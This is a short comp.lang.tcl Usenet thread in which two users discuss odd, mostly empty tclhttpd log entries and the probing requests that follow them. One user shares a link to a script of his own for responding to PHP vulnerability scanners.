Thread from comp.lang.tcl (4 replies)

tclhttpd logs

Posted by saito <saitology9@gmail.com> 3 months ago

I wonder if anyone is familiar with tclhttpd log entries and can shed 
some light on this:

Typically each log entry contains a bunch of attributes including the ip 
address, a timestamp, the requested url, user agent, http code, etc. 
But I am seeing an increasing number of weird entries where most of that 
info is empty. The lines only include the ip address and the timestamp, 
and the rest is just "- - - - -".

What does this mean?

Click on article to view all threads in comp.lang.tcl

Re: tclhttpd logs

Posted by Colin Macleod <user7@cmacleod.me.uk.invalid> 3 months ago

saito <saitology9@gmail.com> posted:

> I wonder if anyone is familiar with tclhttpd log entries and can shed 
> some light on this:
> 
> Typically each log entry contains a bunch of attributes including the ip 
> address, a timestamp, the requested url, user agent, http code, etc. 
> But I am seeing an increasing number of weird entries where most of that 
> info is empty. The lines only include the ip address and the timestamp, 
> and the rest is just "- - - - -".
> 
> What does this mean?

Yes I see this occasionally, got a single one yesterday, none today.  I don't know what causes it though.

-- 
Colin Macleod.

Click on article to view all threads in comp.lang.tcl

Re: tclhttpd logs

Posted by saito <saitology9@gmail.com> 3 months ago

On 7/3/2024 3:00 PM, Colin Macleod wrote:
> 
> Yes I see this occasionally, got a single one yesterday, none today.  I don't know what causes it though.
> 

Yeah, it doesn't look kosher. I saw like 10 of them like that one after 
another.  Then I get normal entries from the same source but the 
requests all appear to be hacking attempts containing shell commands 
with rm, cd, wget, or some .php stuff.

Click on article to view all threads in comp.lang.tcl

Re: tclhttpd logs

Posted by Colin Macleod <user7@cmacleod.me.uk.invalid> 3 months ago

saito <saitology9@gmail.com> posted:

> 
> Yeah, it doesn't look kosher. I saw like 10 of them like that one after 
> another.  Then I get normal entries from the same source but the 
> requests all appear to be hacking attempts containing shell commands 
> with rm, cd, wget, or some .php stuff.

Here's a little thing I hacked up to return something suitable to the script kiddies who persist in probing for php weaknesses etc. :
http://paste.tclers.tk/5935

-- 
Colin Macleod.

Click on article to view all threads in comp.lang.tcl

Re: tclhttpd logs

Posted by saito <saitology9@gmail.com> 3 months ago

On 7/4/2024 4:02 AM, Colin Macleod wrote:
> 
> Here's a little thing I hacked up to return something suitable to the script kiddies who persist in probing for php weaknesses etc. :
> http://paste.tclers.tk/5935
> 

Nice! they definitely deserve it :-)

Click on article to view all threads in comp.lang.tcl